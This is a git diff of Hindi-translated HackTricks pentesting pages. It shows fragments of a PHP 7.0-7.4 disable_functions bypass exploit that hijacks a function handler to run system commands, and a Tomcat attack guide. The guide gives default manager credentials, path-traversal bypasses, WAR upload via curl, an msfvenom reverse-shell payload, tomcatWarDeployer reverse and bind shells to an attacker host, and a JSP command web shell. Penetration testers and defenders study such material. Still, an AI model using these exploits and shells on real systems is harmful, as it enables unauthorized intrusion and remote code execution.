* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details>

View file

@ -1,20 +1,20 @@
# disable\_functions बाईपास - PHP 7.0-7.4 (\*निक्स केवल)
# डिसेबल\_फंक्शन्स बायपास - PHP 7.0-7.4 (\*निक्स केवल)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>
## PHP 7.0-7.4 (\*निक्स केवल)
[https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php) से।
From [https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php](https://github.com/mm0r1/exploits/blob/master/php7-backtrace-bypass/exploit.php)
```php
<?php
@ -229,8 +229,7 @@ write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
# pwn
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4); # internal func type
```php
write($abc, 0xd0 + 0x68, $zif_system); # आंतरिक फंक्शन हैंडलर
write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
($helper->b)($cmd);
exit();
@ -240,10 +239,10 @@ exit();
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करना चाहते हैं? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details>

View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
िशेषताएं खोजें जो सबसे अधिक मायने रखती हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमला सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक आपके पूरे टेक स्टैक में मुद्दों को खोजता है। [**इसे नि: शुल्क परीक्षण के लिए आज़माएं**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
े सुरक्षा गड़बड़ियों को खोजें जो सबसे अधिक मायने रखती हैं ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपके हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**आज ही मुफ्त में इसे ट्राई करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -22,7 +22,7 @@
## खोज
* यह आमतौर पर **पोर्ट 8080** पर चलता है
* यह आम तौर पर **पोर्ट 8080** पर चलता है
* **सामान्य टॉमकैट त्रुटि:**
<figure><img src="../../.gitbook/assets/image (1) (6).png" alt=""><figcaption></figcaption></figure>
@ -35,32 +35,32 @@ curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author"
```
### प्रबंधक फ़ाइलों का पता लगाएं
### व्यवस्थापक फ़ाइलों का पता लगाएं
यह दिलचस्प होता है कि **`/manager`** और **`/host-manager`** पृष्ठ कहा हैं क्योंकि उनका नाम अलग हो सकता है। आप ब्रूट-फ़ोर्स के साथ उन्हें खोज सकते हैं।
यह दिलचस्प है कि **`/manager`** और **`/host-manager`** पृष्ठ कहा हैं क्योंकि उनका नाम अलग हो सकता है। आप इसे ब्रूट-फ़ोर्स के साथ खोज सकते हैं।
### उपयोगकर्ता नाम सूचीकरण
Tomcat6 से पहले कुछ संस्करणों में आप उपयोगकर्ताओं की सूचीकरण कर सकते थे:
कुछ Tomcat6 से पहले के संस्करणों में आप उपयोगकर्ताओं की सूची बना सकते थे:
```bash
msf> use auxiliary/scanner/http/tomcat_enum
```
### डिफ़ॉल्ट क्रेडेंशियल्स
Tomcat का सबसे रोचक पथ _**/manager/html**_ है, इस पथ में **आप वार फ़ाइल अपलोड और डिप्लॉय कर सकते हैं** (कोड चला सकते हैं)। लेकिन यह पथ बेसिक HTTP ऑथ से सुरक्षित है, सबसे सामान्य क्रेडेंशियल्स हैं:
Tomcat का सबसे दिलचस्प मार्ग _**/manager/html**_ है, इस मार्ग के अंदर **आप war फ़ाइलें अपलोड और डिप्लॉय कर सकते हैं** (कोड को निष्पादित करें)। लेकिन यह मार्ग बेसिक HTTP ऑथ से सुरक्षित है, सबसे सामान्य क्रेडेंशियल्स हैं:
* admin:admin
* tomcat:tomcat
* admin:\<कुछ नहीं>
* admin:\<NOTHING>
* admin:s3cr3t
* tomcat:s3cr3t
* admin:tomcat
आप इनमें से और भी टेस्ट कर सकते हैं:
आप इनमें से एक या अधिक को टेस्ट कर सकते हैं:
```bash
msf> use auxiliary/scanner/http/tomcat_mgr_login
```
एक और **रोचक Tomcat** पथ है _**/manager/status**_, जहां आप ओएस और Tomcat के संस्करण को देख सकते हैं। यह उपयोगी होता है जब आप _**/manager/html**_ तक पहुंच नहीं पा रहे हों और Tomcat के संस्करण को प्रभावित करने वाली vulns को खोजने में सहायता मिलती है।
एक और **रोचक Tomcat** पथ है _**/manager/status**_, जहाँ आप ऑपरेटिंग सिस्टम और Tomcat का संस्करण देख सकते हैं। यह उपयोगी है जब आप _**/manager/html**_ तक पहुंच नहीं सकते हैं और Tomcat के संस्करण को प्रभावित करने वाली दोषों को खोजने में मदद मिलती है।
### ब्रूटफोर्स
```bash
@ -71,63 +71,63 @@ msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts <IP>
```
## खोज
## दुरुपयोग
### पासवर्ड बैकट्रेस खुलासा
### पासवर्ड बैकट्रेस डिस्क्लोज़र
`/auth.jsp` तक पहुंचने का प्रयास करें और यदि आप बहुत भाग्यशाली हैं तो यह **बैकट्रेस में पासवर्ड खुलासा कर सकता है**।
`/auth.jsp` तक पहुंचने का प्रयास करें और यदि आप बहुत भाग्यशाली हैं तो यह **बैकट्रेस में पासवर्ड डिस्क्लोज़ कर सकता है**।
### डबल URL कोड
### डबल URL एन्कोड
एक अच्छी तरह से जानी जाने वाली कमजोरी _को_ पहुंचने के लिए एप्लिकेशन प्रबंधक \_\_ में mod\_jk है CVE-2007-1860, जो **डबल URL कोड पथ ट्रावर्सल** की अनुमति देता है।
एक प्रसिद्ध कमजोरी _एक्सेस_ एप्लिकेशन प्रबंधक \_\_ में है mod\_jk CVE-2007-1860 में, जो **डबल URL एन्कोड पथ ट्रावर्सल** की अनुमति देता है।
Tomcat के प्रबंधन वेब तक पहुंचने के लिए जाएँ: _pathTomcat/%252E%252E/manager/html_
Tomcat के प्रबंधन वेब तक पहुंचने के लिए: _pathTomcat/%252E%252E/manager/html_
ध्यान दें कि वेबशेल अपलोड करने के लिए आपको डबल URL कोड ट्रिक का उपयोग करने की आवश्यकता हो सकती है और साथ ही कुकी और/या एक SSRF टोकन भी भेजने की आवश्यकता हो सकती है।\
बैकडोर तक पहुंचने के लिए आपको डबल URL कोड ट्रिक का उपयोग करने की आवश्यकता भी हो सकती है।
ध्यान दें कि वेबशेल अपलोड करने के लिए आपको डबल यूआरएल एन्कोड ट्रिक का उपयोग करना पड़ सकता है और साथ ही एक कुकी और/या एक एसएसआरएफ टोकन भेजना भी।\
बैकडोर तक पहुंचने के लिए आपको डबल यूआरएल एन्कोड ट्रिक का उपयोग करने की भी आवश्यकता हो सकती है।
### /उदाहरण
निम्नलिखित उदाहरण स्क्रिप्ट Apache Tomcat v4.x - v7.x के साथ आते हैं और हमलावरों द्वारा प्रणाली के बारे में जानकारी प्राप्त करने के लिए उपयोग किए जा सकते हैं। इन स्क्रिप्ट्स को भी क्रॉस साइट स्क्रिप्टिंग (XSS) इंजेक्शन के लिए संवेदनशील माना जाता है (यहां से [यहां](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/) देखें)।
निम्नलिखित उदाहरण स्क्रिप्ट जो Apache Tomcat v4.x - v7.x के साथ आते हैं और हमलावरों को सिस्टम के बारे में जानकारी प्राप्त करने के लिए उपयोग किए जा सकते हैं। इन स्क्रिप्ट्स को भी क्रॉस साइट स्क्रिप्टिंग (XSS) इन्जेक्शन के लिए कमजोर माना जाता है (से [यहाँ](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/))।
* /उदाहरण/jsp/num/numguess.jsp
* /उदाहरण/jsp/dates/date.jsp
* /उदाहरण/jsp/snp/snoop.jsp
* /उदाहरण/jsp/error/error.html
* /उदाहरण/jsp/sessions/carts.html
* /उदाहरण/jsp/checkbox/check.html
* /उदाहरण/jsp/colors/colors.html
* /उदाहरण/jsp/cal/login.html
* /उदाहरण/jsp/include/include.jsp
* /उदाहरण/jsp/forward/forward.jsp
* /उदाहरण/jsp/plugin/plugin.jsp
* /उदाहरण/jsp/jsptoserv/jsptoservlet.jsp
* /उदाहरण/jsp/simpletag/foo.jsp
* /उदाहरण/jsp/mail/sendmail.jsp
* /उदाहरण/servlet/HelloWorldExample
* /उदाहरण/servlet/RequestInfoExample
* /उदाहरण/servlet/RequestHeaderExample
* /उदाहरण/servlet/RequestParamExample
* /उदाहरण/servlet/CookieExample
* /उदाहरण/servlet/JndiServlet
* /उदाहरण/servlet/SessionExample
* /examples/jsp/num/numguess.jsp
* /examples/jsp/dates/date.jsp
* /examples/jsp/snp/snoop.jsp
* /examples/jsp/error/error.html
* /examples/jsp/sessions/carts.html
* /examples/jsp/checkbox/check.html
* /examples/jsp/colors/colors.html
* /examples/jsp/cal/login.html
* /examples/jsp/include/include.jsp
* /examples/jsp/forward/forward.jsp
* /examples/jsp/plugin/plugin.jsp
* /examples/jsp/jsptoserv/jsptoservlet.jsp
* /examples/jsp/simpletag/foo.jsp
* /examples/jsp/mail/sendmail.jsp
* /examples/servlet/HelloWorldExample
* /examples/servlet/RequestInfoExample
* /examples/servlet/RequestHeaderExample
* /examples/servlet/RequestParamExample
* /examples/servlet/CookieExample
* /examples/servlet/JndiServlet
* /examples/servlet/SessionExample
* /tomcat-docs/appdev/sample/web/hello.jsp
### पथ ट्रावर्सल (..;/)
कुछ [**तोमकैट**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) के कमजोर विन्यासों में आप `/..;/` का उपयोग करके तोमकैट में संरक्षित निर्देशिकाओं तक पहुंच प्राप्त कर सकते हैं।
कुछ [**Tomcat की कमजोर विन्यास**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) में आप `/..;/` पथ का उपयोग करके Tomcat में संरक्षित निर्देशिकाओं तक पहुंच सकते हैं।
इसलिए, उदाहरण के लिए, आप शायद तोमकैट प्रबंधक पृष्ठ तक पहुंच सकते हैं इस तरह से: `www.vulnerable.com/lalala/..;/manager/html`
इसलिए, उदाहरण के लिए, आप **Tomcat प्रबंधक** पृष्ठ तक पहुंच सकते हैं: `www.vulnerable.com/lalala/..;/manager/html`
इस ट्रिक का उपयोग करके संरक्षित पथों को छोड़ने के लिए एक और तरीका है `http://www.vulnerable.com/;param=value/manager/html` तक पहुंचना।
इस ट्रिक का उपयोग करके संरक्षित पथों को छलकरने का **एक और तरीका** है `http://www.vulnerable.com/;param=value/manager/html`
## RCE
अंत में, यदि आपके पास तोमकैट वेब एप्लिकेशन प्रबंधक तक पहुंच है, तो आप **एक .war फ़ाइल अपलोड और डिप्लॉय कर सकते हैं (कोड निष्पादित करें)**
अंततः, यदि आपके पास Tomcat वेब एप्लिकेशन प्रबंधक तक पहुंच है, तो आप **.war फ़ाइल अपलोड और डिप्लॉय कर सकते हैं (कोड को निष्पादित करें)**।
### सीमाएँ
आप केवल तब WAR डिप्लॉय कर सकेंगे जब आपके पास **पर्याप्त विशेषाधिकार** होंगे (भूमिकाएँ: **व्यवस्थापक**, **प्रबंधक** और **प्रबंधक-स्क्रिप्ट**)। इन विवरणों को आमतौर पर `/usr/share/tomcat9/etc/tomcat-users.xml` में परिभाषित किया जाता है (यह संस्करणों के बीच भिन्न हो सकता है) (अधिक जानकारी के लिए [POST ](tomcat.md#post)अनुभाग देखें)।
आप केवल तब WAR डिप्लॉय कर सकेंगे अगर आपके पास **पर्याप्त विशेषाधिकार** हैं (भूमिकाएँ: **व्यवस्थापक**, **प्रबंधक** और **प्रबंधक-स्क्रिप्ट**)। ये विवरण आम तौर पर `/usr/share/tomcat9/etc/tomcat-users.xml` में परिभाषित होते हैं (संस्करणों के बीच भिन्न हो सकते हैं) (देखें [POST ](tomcat.md#post)खंड)।
```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
@ -137,13 +137,7 @@ curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/mana
# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
```
### Metasploit
Metasploit एक शक्तिशाली और लोकप्रिय हैकिंग फ्रेमवर्क है जिसका उपयोग नेटवर्क सुरक्षा और पेंटेस्टिंग के लिए किया जाता है। यह एक ओपन सोर्स टूल है जिसे Rapid7 द्वारा विकसित किया गया है। Metasploit कई विभिन्न हैकिंग टेक्निक्स का समर्थन करता है जैसे कि रिमोट एक्सप्लोइटेशन, पोर्ट स्कैनिंग, पासवर्ड क्रैकिंग, और वेब एप्लिकेशन पेंटेस्टिंग। Metasploit का उपयोग करके हैकर्स नेटवर्क परिक्षण कर सकते हैं, सुरक्षा कमजोरियों को खोज सकते हैं और वेब एप्लिकेशनों को अद्यतित कर सकते हैं।
Metasploit के विभिन्न मॉड्यूल्स उपलब्ध होते हैं जो विभिन्न हैकिंग कार्यों को संभव बनाते हैं। इन मॉड्यूल्स का उपयोग करके हैकर्स एक निश्चित निर्देशिका में उपयुक्त एक्शन्स को चला सकते हैं, जैसे कि एक शैलीश एक्सप्लोइट को चलाना, एक शैलीश शेल तक पहुंच प्राप्त करना, या एक शैलीश शेल के माध्यम से रिमोट मशीन को नियंत्रित करना।
Metasploit का उपयोग करने के लिए, हैकर्स को एक मेटरप्रेटर कंट्रोल कंसोल में काम करना होता है जिसे वे एक निश्चित निर्देशिका के साथ शुरू कर सकते हैं। इसके बाद, हैकर्स विभिन्न मॉड्यूल्स का उपयोग करके निर्देशिका में उपयुक्त कार्रवाईयों को चला सकते हैं। Metasploit एक शक्तिशाली और व्यापक फ्रेमवर्क है जो हैकर्स को नेटवर्क पेंटेस्टिंग के लिए एक सरल और सुरक्षित तरीके से उपकरण प्रदान करता है।
### मेटास्प्लॉइट
```bash
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
@ -152,59 +146,35 @@ msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit
```
### MSFVenom रिवर्स शेल
एमएसएफवेनम रिवर्स शेल एक टूल है जिसका उपयोग एक विंडोज या लिनक्स मशीन पर रिवर्स शेल उत्पन्न करने के लिए किया जाता है। यह टूल एक विंडोज या लिनक्स मशीन पर एक रिवर्स शेल बनाने के लिए विभिन्न प्रकार के परिवर्तनों का उपयोग करता है, जैसे कि पोर्ट, एचटीटीपी और एन्कोडिंग आदि। इसका उपयोग एक विंडोज या लिनक्स मशीन पर रिमोट एक्सीक्यूशन को संभव बनाने के लिए किया जा सकता है।
इस टूल का उपयोग करने के लिए, आपको एक रिवर्स शेल पेयलोड बनाने के लिए विभिन्न पैरामीटर्स को सेट करने की आवश्यकता होती है। इन पैरामीटर्स में आपको अपने लक्ष्य मशीन के लिए एक उपयुक्त पोर्ट, एचटीटीपी, एन्कोडिंग और एक आवश्यक फ़ाइल नाम निर्दिष्ट करने की आवश्यकता होती है।
एमएसएफवेनम रिवर्स शेल टूल का उपयोग करने के लिए, आपको निम्नलिखित कमांड का उपयोग करना होगा:
```bash
msfvenom -p <payload> LHOST=<your IP> LPORT=<your port> -f <format> -e <encoder> -o <output file>
```
यहां, `<payload>` आपके उद्देश्य के अनुसार एक रिवर्स शेल पेयलोड का नाम होना चाहिए, `<your IP>` आपके लक्ष्य मशीन का आईपी पता होना चाहिए, `<your port>` आपके लक्ष्य मशीन के लिए एक उपयुक्त पोर्ट नंबर होना चाहिए, `<format>` आपके द्वारा चुने गए आउटपुट फ़ाइल का प्रारूप होना चाहिए, `<encoder>` आपके द्वारा चुने गए एन्कोडर का नाम होना चाहिए, और `<output file>` आपके द्वारा चुने गए आउटपुट फ़ाइल का नाम होना चाहिए।
इसके बाद, आपको अपने उत्पन्न रिवर्स शेल पेयलोड को लक्ष्य मशीन पर एक उचित तरीके से प्रस्तुत करने की आवश्यकता होती है, जैसे कि एक वेब पेज के माध्यम से या एक अन्य तकनीक का उपयोग करके। जब आपका लक्ष्य मशीन रिवर्स शेल पेयलोड को स्वीकार करता है, तो आप उस मशीन पर रिमोट एक्सीक्यूशन को संभव बना सकते हैं।
### MSFVenom रिवर्स शैल
```bash
msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
```
फिर, **`revshell.war` फ़ाइल अपलोड करें और इसे एक्सेस करें (**_**/revshell/**_**)**
फिर, **`revshell.war` फ़ाइल अपलोड करें और इसे तक पहुँचें (**_**/revshell/**_**)**
### [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer) के साथ बाइंड और रिवर्स श
### [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer) के साथ बाइंड और रिवर्स शैल
कुछ स्थितियों में यह काम नहीं करता है (उदाहरण के लिए सन के पुराने संस्करणों में)
कुछ स्थितियों में यह काम नहीं करता है (उदाहरण के लिए sun के पुराने संस्करणों में)
#### डाउनलोड करें
#### डाउनलोड
```bash
git clone https://github.com/mgeeky/tomcatWarDeployer.git
```
#### रिवर्स शेल
A reverse shell is a type of shell in which the target machine initiates the connection to the attacker's machine. This allows the attacker to gain remote access to the target machine and execute commands. Reverse shells are commonly used in penetration testing and hacking activities.
To create a reverse shell, the attacker needs to set up a listener on their machine and then exploit a vulnerability on the target machine to establish a connection. Once the connection is established, the attacker can interact with the target machine's command prompt and execute commands as if they were physically present on the machine.
Reverse shells can be created using various techniques and tools, such as Netcat, Metasploit, or custom scripts. The choice of technique depends on the specific scenario and the available tools.
It is important to note that reverse shells are considered malicious and unauthorized in most cases. They are used by attackers to gain unauthorized access to systems and carry out malicious activities. As a responsible hacker or penetration tester, it is crucial to obtain proper authorization and follow ethical guidelines when performing any kind of hacking activity.
#### रिवर्स शैल
```bash
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
```
#### बाइंड शेल
A bind shell is a type of shell that allows an attacker to gain remote access to a target system. It works by binding a shell to a specific port on the target system, allowing the attacker to connect to that port and gain control over the system. Once the connection is established, the attacker can execute commands on the target system as if they were sitting in front of it. Bind shells are commonly used in network penetration testing to gain unauthorized access to a target system.
#### बाइंड शैल
```bash
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
```
### [Culsterd](https://github.com/hatRiot/clusterd) का उपयोग करें
### [Culsterd](https://github.com/hatRiot/clusterd) का उपयोग
```bash
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
```
### मैन्युअल तरीका - वेब शैल
### मैन्युअल विधि - वेब शैल
इस [सामग्री](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) के साथ **index.jsp** बनाएं:
**index.jsp** बनाएं और इस [सामग्री](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) के साथ:
```java
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
@ -235,9 +205,7 @@ jar -cvf ../webshell.war *
webshell.war is created
# Upload it
```
आप इसे भी स्थापित कर सकते हैं (अपलोड, डाउनलोड और कमांड निष्पादन की अनुमति देता है): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
### मैन्युअल तरीका 2
### मैन्युअल विधि 2
एक JSP वेब शैल जैसे [यह](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) प्राप्त करें और एक WAR फ़ाइल बनाएं:
